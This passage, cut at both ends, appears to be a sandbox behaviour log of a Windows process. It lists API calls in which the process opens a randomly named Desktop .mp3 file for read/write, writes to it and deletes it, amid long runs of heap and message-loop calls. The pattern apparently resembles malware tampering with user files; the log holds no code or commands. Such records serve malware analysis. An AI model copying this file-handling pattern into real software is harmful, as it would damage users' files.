ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0x59fa3130, ftLastWriteTime.dwHighDateTime=0x1d5de26, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x0, dwReserved1=0x657690, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 0x6b8b38 [0076.053] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.053] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.053] CharLowerBuffW (in: lpsz="byte[59409]", cchLength=0xb | out: lpsz="byte[59409]") returned 0xb [0076.054] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.054] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0076.054] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.054] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0076.054] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0076.054] FreeLibrary (hLibModule=0x76f90000) returned 1 [0076.054] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.055] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.055] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.056] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6egorexjkdl7op.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0076.057] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.057] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.059] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.059] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.059] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0076.059] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.059] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.059] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.060] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.060] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.060] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.060] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.060] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.060] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0076.060] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.060] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.061] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.061] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.061] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.061] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.061] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpFilePart=0x0) returned 0x38 [0076.062] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0xca1c45a0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 0x6b8b38 [0076.062] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6egorexjkdl7op.mp3")) returned 1 [0076.064] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3ce02d0, ftCreationTime.dwHighDateTime=0x1d5dba6, ftLastAccessTime.dwLowDateTime=0x59fa3130, ftLastAccessTime.dwHighDateTime=0x1d5de26, ftLastWriteTime.dwLowDateTime=0xca1c45a0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xe811, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="6EgOrexJkDL7op.mp3", cAlternateFileName="6EGORE~1.MP3")) returned 0 [0076.064] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.064] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0076.064] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0076.065] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0076.066] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9c8 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.066] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.066] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.067] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.067] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.067] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690700 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da40 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.067] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e300 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.067] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0076.067] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.067] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0076.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.068] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.068] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.069] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.069] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0076.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.069] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.069] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.070] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.070] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.070] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.070] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.070] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.070] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.070] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0076.070] RtlAllocateHeap 